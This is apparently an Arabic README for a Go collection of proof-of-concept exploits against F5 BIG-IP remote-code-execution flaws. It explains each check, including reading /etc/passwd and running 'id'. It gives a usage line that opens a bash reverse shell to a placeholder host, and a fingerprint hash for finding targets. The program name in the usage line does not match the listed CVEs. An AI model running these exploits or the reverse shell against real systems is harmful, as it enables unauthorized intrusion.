
CVE-2020-5902 CVE-2021-22986 CVE-2022-1388 مجموعة POC
مكتوب بلغة Go، مجموعة POCs للثغرات CVE-2020-5902 وCVE-2021-22986 وCVE-2022-1388، وسيتم إضافة POCs أخرى لـ F5 لاحقًا
المؤلف:160team.west9B
للاستخدام فقط من قبل باحثي الأمن بعد الحصول على إذن، مع الالتزام بقانون الأمن السيبراني. أي مشاكل تنشأ تكون على مسؤولية المستخدم ولا علاقة للمؤلف بها.
مجموعة POCs الخاصة بـ F5:
CVE-2020-5902:ثغرة تنفيذ التعليمات البرمجية عن بُعد في F5 BIG-IP
CVE-2021-22986:ثغرة تنفيذ أوامر عن بُعد غير مصرح بها في iControl REST الخاص بـ F5 BIG-IP
CVE-2022-1388:تنفيذ أوامر عن بُعد عبر تجاوز المصادقة
التحقق من CVE-2020-5902 يستخدم تنزيل ملف تعسفي، وإذا تم إرجاع /etc/passwd فإن الثغرة موجودة
POC الخاص بـ CVE-2021-22986 وCVE-2022-1388 ينفذ افتراضيًا أمر id، وإذا تم إرجاع {id} فإن الثغرة موجودة، ويمكن استخدام -c لتخصيص الأمر
الاستخدام: ./cve-2022-30525.exe -m exp -u url -c bash -i >& /dev/tcp/xxxx/1377 0>&1

icon_hash="-335242539"